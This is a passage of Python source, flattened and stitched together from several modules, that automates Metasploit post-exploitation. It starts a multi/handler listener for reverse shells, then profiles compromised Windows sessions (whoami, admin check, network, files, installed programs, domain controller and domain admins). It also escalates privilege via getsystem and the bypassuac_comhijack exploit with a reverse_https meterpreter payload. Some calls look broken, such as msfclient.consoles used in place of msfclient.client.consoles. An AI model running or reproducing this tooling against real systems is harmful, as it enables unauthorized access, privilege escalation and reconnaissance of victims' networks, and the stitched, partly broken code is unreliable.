def deleteSessions(): ''' deletes all session data ''' Session.objects().delete() EscalationData.objects().delete() Recon.objects().delete()
def gatherWhoAmI(self, msfclient, sessionInput): EventUtils.settingEvent(self, "Gathering whoami data from session " + sessionInput +".") try: whoami_input = [] whoami = msfclient.client.sessions.session(sessionInput).run_psh_cmd("whoami", timeout=30) session = Session.objects(_id=sessionInput).first() if session: recon = Recon.objects(session_id=sessionInput).first() if recon: whoami_input = whoami.splitlines() recon.whoami = whoami_input[1] else: recon = Recon() recon.session_id = sessionInput recon._id = sessionInput session.recon_id.append(recon.session_id) for lines in whoami.splitlines(): if lines == '': pass else: recon.whoami = lines recon.save() session.save() EventUtils.settingEvent(self, "whoami data for session " +sessionInput+ ": " +recon.whoami+".") except MsfError: print(f"[!]Session {sessionInput} threw timeout error.") print("[!]Killing session...") msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}') time.sleep(10) pass except Exception as msg: logger.info(msg) print("There was an error!") pass
def gatherCurrentAdmin(self, msfclient, sessionInput): EventUtils.settingEvent(self, "Gathering current admin on session " + sessionInput + ".") try: admin = msfclient.client.sessions.session(sessionInput).run_psh_cmd("net sessions", timeout=30) session = Session.objects(_id=sessionInput).first() if session: recon = Recon.objects(session_id=sessionInput).first() if recon: for lines in admin.splitlines(): if not 'Access is denied.' in lines: recon.isAdmin = True else: recon.isAdmin = False else: recon = Recon() recon.session_id = sessionInput recon._id = sessionInput session.recon_id.append(recon.session_id) for lines in admin.splitlines(): if not 'Access is denied.' in lines: EventUtils.settingEvent(self, "Session "+sessionInput+" is admin.") recon.isAdmin = True else: EventUtils.settingEvent(self, "Session "+sessionInput+" is not admin.") recon.isAdmin = False recon.save() session.save() except MsfError: print(f"[!]Session {sessionInput} threw timeout error.") print("[!]Killing session...") msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}') time.sleep(10) pass
def __init__(self, msfclient): self.msfclient = msfclient # starting mongo global_init() # clearing sessions for new sessions svc.deleteSessions() print("[!]Starting Automation...") EventUtils.settingEvent(self, "Starting automation!") msfrpcdHandler() if self.msfclient.connect() is False: sys.exit() sessionMod(self.msfclient).sessionPrint() # NEED TO IMPROVE THIS session = Session.objects() if session: sessionMod(self.msfclient).activeSessionController() else: print("[!]Running exploit: exploit/multi/handler") exploit = self.msfclient.client.modules.use('exploit', 'exploit/multi/handler') time.sleep(5) exploit['ExitOnSession'] = False time.sleep(2) randomPayload = random.choice(self.choose_payload) print("[!]Using payload: ", randomPayload) _payload = self.msfclient.client.modules.use('payload', randomPayload) time.sleep(2) _payload['LHOST'] = '0.0.0.0' _payload['LPORT'] = '4444' time.sleep(5) exploit.execute(payload=_payload) print("[!]Executing exploit on port ", _payload['LPORT']) time.sleep(10) sessionMod(self.msfclient).activeSessionController()
def checkDisconnected(dictionary): ''' checks if a session is disconnected ''' if not session_list: pass else: if not dictionary: for s in session_list: session = Session.objects(_id=s).first() session.isDisconnected = True session.save() for s_id in session_list: if s_id not in dictionary.items(): session = Session.objects(_id=s_id).first() session.isDisconnected = True session.save()
def gatherFiles(self, msfclient, sessionInput): EventUtils.settingEvent(self, "Gathering file info from session " + sessionInput + ".") try: desc_files = ['Mode', 'Size', 'Type', 'Last', 'Modified', 'TimeZone', 'Name'] listofFiles = msfclient.client.sessions.session(sessionInput).run_with_output('ls', timeout=30).splitlines() session = Session.objects(_id=sessionInput).first() if session: recon = Recon.objects(_id=sessionInput).first() if not recon: Reconnaissance.gatherPWD(self, msfclient, sessionInput) recon = Recon.objects(_id=sessionInput).first() directory = Recon.objects().filter(directory__dir_name=recon.pwd) if directory: for r in directory: for d in r.directory: if not d.gathered: d.gathered = True for f in listofFiles: file = self.parseFileData(f) if not file: pass else: files_mapped = dict(zip(desc_files, file)) d.files.append(files_mapped) r.save() else: current_files = [] for _dict in d.files: current_files.append(_dict['Name']) for f in listofFiles: file = self.parseFileData(f) if not file: pass else: #First check if the file is in the dict if file[6] in current_files: for found_dict in d.files: if file[6]==found_dict['Name']: self.checkingFileChanges(file, found_dict) else: pass else: #if not, add the new file info in the dict files_mapped = dict(zip(desc_files, file)) d.files.append(files_mapped) r.save() except MsfError: print(f"[!]Session {sessionInput} threw timeout error.") print("[!]Killing session...") msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}') time.sleep(10) pass except Exception as msg: logger.info(msg) print(msg) pass
def gatherDomain(self, msfclient, sessionInput): try: EventUtils.settingEvent(self, "Gathering domain info from session " + sessionInput + ".") domain = "" user_list = {'User': '******', 'IP': '0.0.0.0'} domain_user = [] post = msfclient.client.modules.use('post', 'windows/gather/enum_domain') post['SESSION'] = sessionInput cid = msfclient.console run_enum_domain = msfclient.client.consoles.console(cid).run_module_with_output(post) for line in run_enum_domain.splitlines(): if '[-]' in line: print("[-] Issue gathering domain info!") else: if line.find("Domain: ") != -1: domain = line.split("Domain: ",1)[1] elif line.find("Controller: ") != -1: domain_user_info = line.split("Controller: ", 1)[1].split() user_list['User'] = domain_user_info[0].upper() user_list['IP'] = domain_user_info[2].replace(')', '') else: print("[-] Issue gathering domain info!") post = msfclient.client.modules.use('post', 'windows/gather/enum_domain_group_users') post['GROUP'] = 'domain admins' post['SESSION'] = sessionInput run_enum_domain_group_users = msfclient.consoles.console(cid).run_module_with_output(post) for line in run_enum_domain_group_users.splitlines(): if domain in line: users = line.split('\\')[1] if 'not' in users: pass else: domain_user.append(users) session = Session.objects(_id=sessionInput).first() if session: recon = Recon.objects(_id=sessionInput).first() if recon is None: recon = Recon() recon_domain = ReconDomain() recon_domain.domain = domain recon_domain.domain_controller = user_list recon_domain.domain_user = domain_user recon.save() except MsfError: print(f"[!]Session {sessionInput} threw timeout error.") print("[!]Killing session...") msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}') time.sleep(10) pass except Exception as msg: print(msg)
def getElevated(self, msfclient, sessionInput): try: EventUtils.settingEvent( self, "Trying to get elevated on session" + sessionInput + ".") session = Session.objects(_id=sessionInput).first() if session: esc = EscalationData.objects(_id=sessionInput).first() if esc: EventUtils.settingEvent( self, "[" + sessionInput + "] You currently own the system.") print("[!]You own the system.") else: EventUtils.settingEvent( self, "[" + sessionInput + "] Attempting to elevate via getsystem...") esc = EscalationData() getsystem = msfclient.client.sessions.session( sessionInput).run_with_output( 'getsystem').splitlines() if '[-]' in getsystem[0]: EventUtils.settingEvent( self, "[" + sessionInput + "] Attempting bypassuac_comijack...") print( "[!]Failed getsystem. Trying bypassuac_comijack..." ) exploit = msfclient.client.modules.use( 'exploit', 'exploit/windows/local/bypassuac_comhijack') exploit['SESSION'] = int(sessionInput) payload = msfclient.client.modules.use( 'payload', 'windows/x64/meterpreter/reverse_https') payload['LHOST'] = "0.0.0.0" payload['LPORT'] = 4444 exploit.execute(payload=payload) esc.getsystem = True session.esc_id.append(esc._id) else: EventUtils.settingEvent( self, "[" + sessionInput + "] You currently own the system.") print("[+]Gained system. Start gaining info") session.esc_id.append(esc._id) esc.getsystem = True esc.save() session.save() except Exception as msg: print(msg) pass
def gatherInstalledPrograms(self, msfclient, sessionInput): try: EventUtils.settingEvent(self, "Gathering installed program info from session " + sessionInput +".") program_desc = ['Name', 'Version'] current_programs = [] session = Session.objects(_id=sessionInput).first() msfclient.client.sessions.session(sessionInput).write('run post/windows/gather/enum_applications') time.sleep(10) run_post = msfclient.client.sessions.session(sessionInput).read() listofPrograms = run_post.splitlines() if session: recon = Recon.objects(_id=sessionInput).first() if recon is None: recon = Recon() recon._id = sessionInput recon.session_id = sessionInput session.recon_id.append(recon.session_id) else: for p in listofPrograms: program = self.parseProgramList(p) if not program: pass else: programs_mapped = dict(zip(program_desc, program)) if not recon.gathered_programs: recon.installedprg.append(programs_mapped) else: for list in recon.installedprg: for key, value in list.items(): if key in programs_mapped: pass else: recon.installedprg.append(programs_mapped) recon.gathered_programs = True recon.save() session.save() except MsfError: print(f"[!]Session {sessionInput} threw timeout error.") print("[!]Killing session...") msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}') time.sleep(10) pass except Exception as msg: logger.info(msg) print(msg) pass
def gatherNetwork(self, msfclient, sessionInput): EventUtils.settingEvent(self, "Gathering network info on session " + sessionInput + ".") try: session = Session.objects(_id=sessionInput).first() ip = msfclient.client.sessions.session(sessionInput).run_psh_cmd("ipconfig /all", timeout=30) if session: recon = Recon.objects(session_id=sessionInput).first() if recon: self.parseIPData(recon, ip) else: recon = Recon() recon.session_id = sessionInput recon._id = sessionInput session.recon_id.append(recon.session_id) self.parseIPData(recon, ip) recon.save() session.save() except MsfError: print(f"[!]Session {sessionInput} threw timeout error.") print("[!]Killing session...") msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}') time.sleep(10) pass
def gatherPWD(self, msfclient, sessionInput): EventUtils.settingEvent(self, "Gathering pwd from session " + sessionInput + ".") try: current_pwd = msfclient.client.sessions.session(sessionInput).run_with_output('pwd', timeout=30) session = Session.objects(_id=sessionInput).first() if session: recon = Recon.objects(session_id=sessionInput).first() if recon: if recon.pwd == current_pwd: pass else: recon.pwd = current_pwd reconfiles = ReconFiles() reconfiles.dir_name = current_pwd recon.directory.append(reconfiles) else: recon = Recon() recon.session_id = sessionInput recon._id = sessionInput session.recon_id.append(recon.session_id) recon.pwd = current_pwd reconfiles = ReconFiles() reconfiles.dir_name = current_pwd recon.directory.append(reconfiles) recon.save() session.save() except MsfError: print(f"[!]Session {sessionInput} threw timeout error.") print("[!]Killing session...") msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}') time.sleep(10) pass except Exception as msg: logger.info(msg) print("There was an error!") pass